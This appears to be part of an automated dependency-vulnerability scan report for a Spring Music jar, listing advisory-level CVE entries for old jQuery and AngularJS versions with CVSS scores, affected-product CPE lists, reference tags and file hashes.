cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 CVE-2020-11023 suppress
CISA Known Exploited Vulnerability: Product: JQuery JQuery Name: JQuery Cross-Site Scripting (XSS) Vulnerability Date Added: 2025-01-23 Description: JQuery contains a persistent cross-site scripting (XSS) vulnerability. When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser. Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Due Date: 2025-02-13 Notes: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2020-11023
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:* cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:cloud_insights_storage_workload_security_agent:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:hci_baseboard_management_controller:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2 cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.1; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:health_sciences_inform:6.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hyperion_financial_reporting:11.1.2.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:* versions up to (excluding) 2.12.41 cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_resources:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:siebel_mobile:*:*:*:*:*:*:*:* versions up to (including) 20.12 cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 CVE-2022-25869 suppress
All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* CVE-2020-7676 suppress
angular.js prior to 1.8.0 allows cross site scripting. The regex-based input HTML replacement may turn sanitized code into unsanitized one. Wrapping "<option>" elements in "<select>" ones changes parsing behavior, leading to possibly unsanitizing code. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:2.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.8.0 CVE-2023-26116 suppress
Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-2vrf-hf26-jrp5 report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.2.21; versions up to (including) 1.8.3 CVE-2023-26117 suppress
Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the $resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-2qqx-w9hr-q5gx report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.0.0; versions up to (including) 1.8.3 CVE-2023-26118 suppress
Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-qwqh-hm9m-p5hr report@snyk.io - EXPLOIT report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.4.9; versions up to (including) 1.8.3 CVE-2024-8373 suppress
Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing https://owasp.org/www-community/attacks/Content_Spoofing .
This issue affects all versions of AngularJS.
Note:
The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here https://docs.angularjs.org/misc/version-support-status . CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (including) 1.8.3 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:* Cross-Site Scripting via JSONP (RETIREJS) suppress
Cross-Site Scripting via JSONP Unscored:
References:
DOS in $sanitize (RETIREJS) suppress
DOS in $sanitize Unscored:
References:
The attribute usemap can be used as a security exploit (RETIREJS) suppress
The attribute usemap can be used as a security exploit Unscored:
References:
Universal CSP bypass via add-on in Firefox (RETIREJS) suppress
Universal CSP bypass via add-on in Firefox Unscored:
References:
XSS via JQLite DOM manipulation functions in AngularJS (RETIREJS) suppress
XSS via JQLite DOM manipulation functions in AngularJS Unscored:
References:
CVE-2025-0716 (RETIREJS) suppress
Unscored:
References:
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS) suppress
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 Unscored:
References:
XSS in $sanitize in Safari/Firefox (RETIREJS) suppress
XSS in $sanitize in Safari/Firefox Unscored:
References:
jquery issue: 162 (RETIREJS) suppress
jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates Unscored:
References:
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: webjars-requirejs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/webjars-requirejs.jsMD5: 454afbee5c9ea18772836e091ccbf3f0SHA1: 3f773171678959bdc3b4654f05ac0eac55721200SHA256: 3e7356c741a39a4d7d402010dd09b636b4b29b8446641885b666429eeaa79a21
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: antlr-2.7.7.jarDescription:
A framework for constructing recognizers, compilers,
and translators from grammatical descriptions containing
Java, C#, C++, or Python actions.
License:
BSD License: http://www.antlr.org/license.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/antlr-2.7.7.jar
MD5: f8f1352c52a4c6a500b597596501fc64
SHA1: 83cd2cd674a217ade95a4bb83a8a14f351f48bd0
SHA256: 88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c
